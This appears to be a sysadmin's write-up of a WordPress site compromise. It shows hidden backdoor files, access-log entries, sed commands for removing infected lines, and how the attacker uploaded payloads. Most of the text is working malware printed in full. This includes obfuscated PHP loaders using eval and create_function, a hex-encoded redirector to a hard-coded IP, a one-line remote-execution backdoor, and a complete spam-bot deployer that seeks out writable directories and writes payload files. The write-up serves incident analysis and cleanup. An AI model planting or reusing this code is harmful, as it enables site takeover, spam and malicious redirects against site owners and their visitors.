{ ["file"]=> string(45) "/home/xyz/public_html/wp-blog-header.php" ["line"]=> int(12) ["args"]=> array(1) { [0]=> string(38) "/home/xyz/public_html/wp-load.php" } ["function"]=> string(12) "require_once" } [6]=> array(4) { ["file"]=> string(36) "/home/xyz/public_html/index.php" ["line"]=> int(29) ["args"]=> array(1) { [0]=> string(45) "/home/xyz/public_html/wp-blog-header.php" } ["function"]=> string(7) "require" } }
The file was owned by nobody and chmod 777.
-rwxrwxrwx 1 nobody nobody 20540 Sep 5 2007 .akismet.bak.php*
-rw-r--r-- 1 xyz xyz 19708 Jul 9 2011 akismet.php
-rwxrwxrwx 1 nobody nobody 46368 Sep 5 2007 .wp-db-backup.cache.php*
More Backdoors
<?php /* copyright */
$z=get_option("_site_transient_poptags_d98e7e0179821ec8f0ced62e944cf105"); $z=base64_decode(str_rot13($z)); if(strpos($z,"D638F1F7")!==false){ $_z=create_function("",$z); @$_z(); }
${"G\x4c\x4f\x42\x41L\x53"}["\x74x\x65\x66f\x62c\x76\x74w\x64\x6b"]="k";${"\x47L\x4f\x42\x41\x4c\x53"}["\x73\x76\x63y\x75\x78\x74v"]="k";${"G\x4cO\x42\x41\x4cS"}["\x68\x63\x66\x6fc\x6ev\x6e"]="c";${"\x47\x4cO\x42A\x4cS"}["f\x62\x71m\x77w\x63\x7a\x77gb"]="\x61";$uhhmemlj="v";${"GLO\x42\x41L\x53"}["\x70\x69\x74x\x77b\x7a\x76\x63\x64\x64"]="b";foreach($_GET as${${"\x47\x4c\x4fB\x41L\x53"}["\x74\x78\x65ff\x62\x63\x76tw\x64\x6b"]}=>${$uhhmemlj})if(preg_match("\x21\x5e\x5ba-z\x30-\x39\x5d{\x310\x2c32\x7d\x24!\x69s",${${"GLOB\x41\x4cS"}["\x73vcy\x75\x78\x74v"]})){session_start();if(isset($_POST["res"])&&$_SESSION["r\x65\x73"]==$_POST["\x72e\x73"]){header("\x4c\x6f\x63a\x74io\x6e\x3a \x68tt\x70\x3a\x2f/9\x35\x2e\x31\x36\x39\x2e187.\x39\x38/\x69jh\x66h\x66.p\x68\x70\x3f\x6dg\x74\x64\x66k=\x34\x353\x34\x26\x6ev\x68\x64l=sk\x64\x6ae&go\x6bk\x3d".substr(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x74\x78\x65\x66\x66\x62\x63\x76\x74\x77\x64\x6b"]},-5));}else{$vxomtd="\x63";$kghtssqccjlo="\x61";${$kghtssqccjlo}=mt_rand(1,9);${$vxomtd}=mt_rand(1,9);if(mt_rand(0,1)==1){$yeygmwcsueb="\x61";${"\x47L\x4fB\x41\x4cS"}["s\x77c\x6e\x62\x71c\x78"]="\x62";$_SESSION["\x72e\x73"]=${$yeygmwcsueb}+${${"G\x4c\x4f\x42ALS"}["\x68\x63\x66\x6f\x63nv\x6e"]};${${"GLO\x42\x41L\x53"}["\x73w\x63n\x62q\x63\x78"]}="+";}else{$yliifkkgn="\x61";${"\x47LO\x42AL\x53"}["\x6a\x66\x75\x74\x70\x6f\x68xk\x77\x6b"]="\x62";${"GLOB\x41\x4c\x53"}["rii\x71\x75\x66\x6a\x76\x73\x79"]="\x63";$_SESSION["\x72\x65\x73"]=${$yliifkkgn}-${${"\x47\x4c\x4fB\x41LS"}["\x72ii\x71u\x66j\x76\x73\x79"]};${${"G\x4c\x4fB\x41\x4c\x53"}["jf\x75\x74p\x6fhx\x6bwk"]}="\x2d";}${"GL\x4f\x42\x41\x4c\x53"}["\x6d\x76\x68\x69fa\x63"]="c";echo"\x3c\x66o\x72\x6d m\x65\x74h\x6f\x64\x3d'po\x73\x74'\x3e\n\t \x20 \x20<d\x69v\x20sty\x6ce='\x77\x69\x64t\x68\x3a\x352\x30\x70x\x3b \x6dar\x67i\x6e\x3a0p\x78\x20a\x75\x74\x6f;\x20\x6d\x61rgi\x6e\x2d\x74o\x70:10\x30p\x78\x3b\x20\x70\x61ddi\x6e\x67:\x31\x35\x70x;\x20\x62\x6f\x72\x64\x65\x72:1p\x78 \x73oli\x64 \x233\x333\x3b\x20b\x61\x63k\x67\x72ound-\x63o\x6c\x6fr\x3a\x23ee\x65\x3b\x27\x3e\n\t\x20 \x20\x20P\x6ceas\x65 verif\x79\x20that \x79ou \x61\x72e\x20\x68\x75m\x61n\x2c\n\t \x20\x20 \x77h\x61t\x20\x69\x73\x20\x72\x65\x73ult\x20of\x3a\x20".${${"GLO\x42\x41\x4c\x53"}["\x66\x62\x71\x6dw\x77\x63\x7a\x77\x67\x62"]}."\x20".${${"G\x4c\x4f\x42\x41LS"}["\x70i\x74xw\x62\x7a\x76\x63\x64\x64"]}."\x20".${${"\x47\x4c\x4f\x42A\x4c\x53"}["mv\x68if\x61c"]}." =\n\t \x20\x20\x20<in\x70u\x74 ty\x70e='t\x65\x78\x74' n\x61\x6de\x3d\x27\x72es\x27\x20s\x69\x7ae\x3d'\x32\x27\x20\x76\x61\x6cue\x3d'\x3f'\x3e\n\t <\x69np\x75\x74 typ\x65=\x27\x73ubmit'\x20v\x61\x6cu\x65=\x27I am H\x75man!\x27>\n\t \x20\x3c\x2fd\x69\x76\x3e<\x2fform>";}exit;} /* copyright */ ?>
Fix
Run something similar to:
for i in `grep -R _site_transient_browser_0fe9ad43f3a2d4701299dbdbc9a10eeb --include=*.php . | cut -d: -f 1 ` ; do sed -i '/_site_transient_browser_0fe9ad43f3a2d4701299dbdbc9a10eeb/d' $i ; echo $i ; done
sed -i '/if(md5(\$_COOKIE/d' asdfasdfasdf.php
<?php $_F=__FILE__;$_X='Pz48ZDR2IGNsMXNzPSJjbDUxbjV
yIj48L2Q0dj4NCjwvZDR2Pg0KPGQ0diA0ZD0iYjJ4Ij4NCkQ1czRnbjVkIGJ5IDwxIGhyNWY9Imh0dHA6Ly93d3cudzJyZHByNXNzLXRoNW01cy5uNXQtd
DVjLmI0eiI+VzJyZHByNXNzIFRoNW01czwvMT4gMmYgPDEgaHI1Zj0iaHR0cDovL3d3dy53MnctZzJsZC1wcjRjNS1sNHN0LmMybSI+V09XIEcybGQ8LzE
+IG0xZDUgZnI1NSBieTogPDEgaHI1Zj0iaHR0cDovL3d3dy5teWIxYnkxZHY0YzUuYzJtL2IxYnlzNHR0NXIuaHRtbCI+RjRuZCBBIEIxYnlzNHR0NXIgV
zR0aCBTNHR0NXJDNHR5PC8xPiAxbmQgPDEgaHI1Zj0iaHR0cDovL2c1MXIxZHI0ZnQuYzJtL2Yyci1zMWw1L200bDR0MXJ5LWI0bjJjM2wxcnMvIj5NNGw
0dDFyeSBCNG4yYzNsMXJzPC8xPg0KPC9kNHY+DQo8L2Q0dj4NCjwvYjJkeT4NCjwvaHRtbD4=';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGU
oJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciL
CRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>
How it is uploaded
I noticed a new script that was being abused today. Looking at the logs for the first occurrence of the exploited script shows this:
176.31.148.191 - - [23/Feb/2015:20:51:46 -0700] "POST /.wysywigPro_edit_index_html.php HTTP/1.1" 200 200 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
176.31.148.191 - - [23/Feb/2015:20:52:00 -0700] "GET /wordpress/wp-includes/js/crop/article.php HTTP/1.1" 200 67 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
The hidden wysywigPro PHP script looks like a legit file created via cPanel's file editor when the user attempts to edit the file using the wysiwyg editor. However, it has the following remote execution code injected to the start of the file:
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q117aaf'])){eval(${$s20}['q117aaf']);}?><?php ob_start() ?>
The attacker will submit a hack that will traverse all writable directories in the working directory and pick a random location to write the spammer bot payload. Here is the decoded version of their code. The payload is a long base64 encoded string which I left out (The contents of it is available and documented above.)
$key="?LNAoOpx%IC=Q{f/7k!\"0t\$,`b2v@wPha(gXjy+VM\n\t91Sizs.YZn<:)|\\TGqB8>4-UD*}'eEWu^[J r\r3&K_HcR]F;m~5#6ld";
$targetUrl = 'http://firefromthesky.org//.wysywigPro_edit_index_html.php';
$phpExt = 'php';
$spamBotCode = b64decode($key, $payload);
$directoryKeywords = array ('dirs', 'dir', 'lib', 'search', 'stats', 'info', 'functions', 'db', 'inc', 'include', 'admin', 'user', 'system', 'file', 'files',
'global', 'template', 'blog', 'header', 'footer', 'press', 'test', 'title', 'code', 'options', 'option', 'general', 'gallery', 'themes',
'article', 'login', 'ajax', 'start', 'cache', 'proxy', 'menu', 'page', 'list', 'config', 'alias', 'defines', 'css', 'javascript', 'diff',
'ini', 'sql', 'xml', 'error', 'dump', 'utf', 'help', 'session', 'model', 'view', 'object', 'plugin');
print '
<shchzzz>
';
if (ietib34($key, FALSE, $targetUrl, $phpExt, $spamBotCode, $directoryKeywords)) {
print '<wrn lp=false stage=9 type=done data=>
';
} else {
if (ietib34($key, TRUE, $targetUrl, $phpExt, $spamBotCode, $directoryKeywords)) {
print '<wrn lp=true stage=9 type=done data=>
';
} else {
print '<err lp=true stage=9 type=err data=>
';
}
}
print '</shchzzz>
';
exit;
function ietib34($key, $lpValue, $targetUrl, $phpExt, $spamBotCode, $directoryKeywords) {
$foundResult = false;
list($resultCode, $lpValue, $documentRoot, $foundUrl) = determineDocumentRootAndUri($key, $lpValue, $targetUrl);
if ($resultCode != 0 ) {
print '<err lp='.$lpValue.' stage=1 code='.$resultCode.'>
';
return $foundResult;
}
print '<inf lp='.$lpValue.' stage=2 type=cwd data="'.$documentRoot.'">
';
print '<inf lp='.$lpValue.' stage=3 type=ur data="'.$foundUrl.'">
';
$foundWritableDirectories = array();
iwmoa26($key, $documentRoot, $foundWritableDirectories);
print '<inf lp='.$lpValue.' stage=4 type=gddr data="'.count($foundWritableDirectories).'">
';
for ($ujrhi67 = 0; $ujrhi67 < 5; $ujrhi67++) {
$spamFileName = "";
$newHackUrl = "";
$resultCode = getRandomSpamLocation($key, $phpExt, $foundWritableDirectories, $documentRoot, $foundUrl, $directoryKeywords, $spamFileName, $newHackUrl);
if ($resultCode == 0) {
print '<err lp='.$lpValue.' stage=5 code=>
';
break;
}
$resultCode = writeSpamBotToFile($key, $spamFileName, $spamBotCode);
if ($resultCode == 0) {
continue;
}
// data1 = the relative spam file location, data2 = spam file URL
print '<inf stage=7 type=upl data1="'.$spamFileName.'" data2="'.$newHackUrl.'">
';
$foundResult = true;
break;
}
return $foundResult;
}
function writeSpamBotToFile($key, $spamFileName, $spamBotCode) {
$spamFile = @fopen($spamFileName, 'x');
if ($spamFile === FALSE) {
print '<err stage=6 type=fopen>
';
return 0;
}
$bytesWritten = @fwrite($spamFile, $spamBotCode);
if ($bytesWritten != strlen($spamBotCode)) {
print '<err stage=6 type=fwrite data='.strlen($spamBotCode).'x'.$bytesWritten.'>
';
return 0;
}
@fclose($spamFile);
return 1;
}
function getRandomSpamLocation($key, $phpExt, $foundWritableDirectories, $documentRoot, $foundUrl, $directoryKeywords, &$spamFileName, &$newHackUrl) {
shuffle($directoryKeywords);
shuffle($foundWritableDirectories);
for ($i = 0; $i < count($foundWritableDirectories); $i++) {
for ($j = 0; $j < count($directoryKeywords); $j++) {
$spamFileCandidateName = $foundWritableDirectories[$i].DIRECTORY_SEPARATOR.$directoryKeywords[$j].'.'.$phpExt;
if (@file_exists($spamFileCandidateName)) continue;
$newHackFileName = substr($spamFileCandidateName, strlen($documentRoot));
$newHackFileName = @preg_replace('/\\/', '/', $newHackFileName);
$spamFileName = $spamFileCandidateName;
$newHackUrl = $foundUrl.$newHackFileName;
return 1;
}
}
return 0;
}
function iwmoa26($key, $wrgnk99, &$foundWritableDirectories) {
$ldcoq38[] = $wrgnk99;
if (is_writable($wrgnk99)) $foundWritableDirectories[] = $wrgnk99;
for ( $ujrhi67 = 0; $ujrhi67 < count($ldcoq38); $ujrhi67++ ) {
$ykpui49 = qzlik90($key, $ldcoq38[$ujrhi67]);
foreach ( $ykpui49 as $fnqqo33 ) {
if ($fnqqo33 == '.' || $fnqqo33 == '..') continue;
$yijlq63 = $ldcoq38[$ujrhi67] . DIRECTORY_SEPARATOR . $fnqqo33;
if (@is_dir($yijlq63)) {
if (@preg_match('/admin/i', $fnqqo33)) continue;
if (@preg_match('/cgi-bin/i', $fnqqo33)) continue;
if (@preg_match('/protected/i', $fnqqo33)) continue;
$ldcoq38[] = $yijlq63;
if (!@is_writable($yijlq63)) continue;
if (@is_link($yijlq63)) continue;
$foundWritableDirectories[] = $yijlq63;
}
}
if ($ujrhi67 > 500 && count($foundWritableDirectories) > 20) break;
}
return;
}
function determineDocumentRootAndUri($key, $lp, $targetUrl) {
$lpValue = $lp; // boolean
$foundUrl = "";
$documentRoot = $_SERVER['DOCUMENT_ROOT'];
if ($lpValue || (!isset($documentRoot) || $documentRoot == "")) {
$lpValue = true;
$documentRoot = @getcwd();/*4,5*/
if (!isset($documentRoot) || $documentRoot == "") {
return array(1, $lpValue, "", "");
}
if (@preg_match('(https?://.*/)', $targetUrl , $awfog84) == 0 ) {
return array(2, $lpValue, "", "");
}
$foundUrl = $awfog84[0];
} else {
if (@preg_match('(https?://.*?/)', $targetUrl , $awfog84) == 0 ) {
return array(3, $lpValue, "", "");
}
$foundUrl = $awfog84[0];
}
// remove ending /
if(substr($documentRoot, -1) == '/') $documentRoot = substr($documentRoot, 0, -1);
if(substr($foundUrl, -1) == '/') $foundUrl = substr($foundUrl, 0, -1);
// 0 = no url found
// 1 = document is not found
// 2 = has a url, but document is not found
// 3 = document found, but no url
// document root of this hack, the URL of the original backdoor
return array(0, $lpValue, $documentRoot, $foundUrl);
}
function qzlik90($key, $gcoqp49) {
$bfdvr95 = array();
$ofhyr48 = @opendir($gcoqp49);
if ($ofhyr48 != FALSE ) {
while (false !== ($dpxxb64 = @readdir($ofhyr48))) {
if (count($bfdvr95) > 5000) break;
$bfdvr95[] = $dpxxb64;
}
closedir($ofhyr48);
}
return $bfdvr95;
}
function b64decode($key, $in){
$out = "";
for($x = 0; $x < 256; $x++) {
$chr[$x] = chr($x);
}
$b64c = array_flip(preg_split("//","ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",-1,1));
$match = array();
preg_match_all("([A-z0-9+\/]{1,4})",$in,$match);
foreach($match[0] as $chunk){
$z = 0;
for($x = 0; isset($chunk[$x]); $x++){
$z = ($z << 6) + $b64c[$chunk[$x]];
if($x > 0){
$out .= $chr[$z >> (4-(2*($x-1)))];
$z = $z & (0xf >> (2 * ($x - 1)));
}
}
}
return $out;
}